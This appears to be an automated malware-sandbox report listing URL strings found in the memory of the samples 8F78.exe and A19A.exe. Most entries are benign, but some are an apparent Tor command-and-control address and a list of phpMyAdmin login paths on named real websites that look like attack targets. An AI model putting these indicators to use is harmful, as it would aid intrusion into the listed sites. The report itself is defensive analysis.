                                Source: A19A.exe, 00000008.00000003.2029883688.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2030515756.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.startssl.com/policy0
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3740884275.0000000004038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                                Source: 8F78.exe, 00000007.00000002.3740884275.0000000004038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/=
                                Source: 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                                Source: 8F78.exe, 00000007.00000002.3640005281.00000000036E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onion/hb.php?n=46B91F4394C2601A5E95&
                                Source: 8F78.exe, 00000007.00000002.3523875772.0000000000824000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/re
                                Source: 8F78.exe, 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https:///phpMyAdmin//PhpMyAdmin//pma/rootmysqlimapssmtpspop3sscp://your_IP_is_greylisted_README.txt2
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abatek.sk/phpmyadmin/
                                Source: explorer.exe, 00000001.00000000.1702956884.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aexoden.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aexoden.com:443/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aloeveraforever.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aloeveraforever.sk/phpmyadmin/D
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aloeveraforever.sk/phpmyadmin/r
                                Source: explorer.exe, 00000001.00000000.1702956884.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                                Source: explorer.exe, 00000001.00000000.1700756289.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                                Source: explorer.exe, 00000001.00000000.1700756289.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                                Source: explorer.exe, 00000001.00000000.1697424437.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1698076635.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                                Source: explorer.exe, 00000001.00000000.1700756289.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1700756289.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                                Source: 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aquamat-liptov.sk/phpmyadmin/
                                Source: explorer.exe, 00000001.00000000.1700756289.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clickbkk.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clickbkk.com/phpmyadmin/22
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cps.securecore-ca.com0
                                Source: 8F78.exe, 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                                Source: 8F78.exe, 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                                Source: 8F78.exe, 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://daxter.fsnet.co.uk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.00000000041F2000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dobrybicykel.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dobrybicykel.sk/phpmyadmin/3
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dobrybicykel.sk/phpmyadmin/V
                                Source: 8F78.exe, 00000007.00000002.3754866218.00000000041F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dobrybicykel.sk/phpmyadmin/d
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e-art-studio.co.jp/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e-art-studio.co.jp/phpmyadmin/&
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e-bicycles.eu/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e-bicycles.eu/phpmyadmin/2
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://e-bicycles.eu/phpmyadmin/k
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elossa.de/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elossa.de/phpmyadmin/c
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elteconline.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.00000000041E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://emmetisportfun.i
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://emmetisportfun.it/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://emmetisportfun.it/phpmyadmin/h
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enp.ericsson.se/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enp.ericsson.se/phpmyadmin/d
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enso-center.org/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enso-center.org/phpmyadmin/-
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enso-center.org/phpmyadmin/a.justdave.net143
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enso-center.org/phpmyadmin/a.justdave.net465I
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3648319405.000000000388A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ericrothphoto.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://erikamoveis.com.br/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://erikamoveis.com.br/phpmyadmin/:
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eshopy-katalog.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/cenova-ponuka/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/kontakt/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/materialy/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/phpmyadmin//e
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/predaj_sklad/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/produkty/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/referencie/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/sluzby/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.8.4
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.8.4
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/wp-content/plugins/gtranslate/js/globe.js?ver=4fd0f5bc13853fae144764d9c4a67c2c
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/wp-content/plugins/wp-meta-and-date-remover/assets/js/inspector.js?ver=1.0
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/wp-content/themes/hestia/assets/bootstrap/js/bootstrap.min.js?ver=1.0.2
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/wp-content/themes/hestia/assets/js/script.min.js?ver=3.1.0
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/wp-content/uploads/2020/09/cropped-Photo_6553902_DJI_302_jpg_4528293_0_20215121
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/wp-includes/js/jquery/jquer
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eurokamen.sk/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                                Source: explorer.exe, 00000001.00000000.1702956884.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://faq.sakura.ad.jp/s/article/000001530
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://feio.jp/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://feio.jp/phpmyadmin/e
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gabio.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html5shiv-printshiv.googlecode.com/svn/trunk/html5shiv-printshiv.js
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu-manity.co/
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://inhodinky.sk/administrator/index.php
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://justdave.net/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://justdave.net/phpmyadmin/R
                                Source: 8F78.exe, 00000007.00000002.3612385811.00000000030E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kanapy.sk/eshop
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khi-ho.ne.jp/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khi-ho.ne.jp/phpmyadmin/.eu
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://khi-ho.ne.jp/phpmyadmin/m
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040CB000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003E80000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kompresory-servis.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kompresory-servis.sk/phpmyadmin/z
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://konic.co.jp/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://konic.co.jp/phpmyadmin/e
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://line.me/R/ti/p/%40tra3365q
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://magokorokan.com/contact/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://magokorokan.com/deployment/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://magokorokan.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://merlynsociety.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/course_annai/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/course_annai/seika/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/course_annai/tyouri01/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/course_annai/tyouri02/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/gakou_kengakukai/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/itsutsu_no_miryoku/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/itsutsu_no_miryoku/access/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/itsutsu_no_miryoku/gakoutyou_message/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/itsutsu_no_miryoku/gakoutyou_message/#enkaku
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/itsutsu_no_miryoku/hygiene-management/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/itsutsu_no_miryoku/syokugyou_jissen
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/kakusyu_seido_ichiran/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/kakusyu_seido_ichiran/kaigai_kensyu/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/kakusyu_seido_ichiran/kakushu_syougakukin_seido/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/kakusyu_seido_ichiran/yugu_shien_seido/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/koushi_syoukai/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/miryoku_05/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/nenkan_schedule/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/nyugaku_annai/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/nyugaku_annai/ichinenkatei/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/nyugaku_annai/ninenkatei/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/otoiawase/
